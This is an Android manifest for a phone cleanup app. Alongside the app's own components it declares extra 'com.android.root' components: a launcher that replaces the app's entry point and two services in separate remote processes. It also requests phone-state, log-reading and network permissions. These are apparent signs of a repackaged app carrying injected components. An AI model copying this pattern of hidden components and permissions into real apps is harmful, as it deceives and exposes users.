<?xml version="1.0" encoding="utf-8" standalone="no"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="cn.com.opda.android.cleanup1">
    <application android:debuggable="true" android:icon="@drawable/speed" android:label="@string/app_name">
        <activity android:label="@string/app_name" android:name=".StartupActivity"/>
        <receiver android:name=".BootstrapReceiver">
            <intent-filter>
                <action android:name="android.intent.action.BOOT_COMPLETED"/>
                <action android:name="com.opda.startup.action.SHUTDOWN_AUTOKILL_SERVICE"/>
                <action android:name="com.opda.startup.action.START_AUTOKILL_SERVICE"/>
            </intent-filter>
        </receiver>
        <service android:name=".BootstrapKillService"/>
        <activity android:name="com.android.root.main">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity>
        <service android:name="com.android.root.Setting" android:process=":remote"/>
        <service android:name="com.android.root.AlarmReceiver" android:process=":remote2"/>
        <meta-data android:name="UMENG_APPKEY" android:value="4d26f9003ea7a3585310fed2"/>
    </application>
    <uses-permission android:name="android.permission.RESTART_PACKAGES"/>
    <uses-permission android:name="android.permission.KILL_BACKGROUND_PROCESSES"/>
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.READ_LOGS"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
    <uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
</manifest>
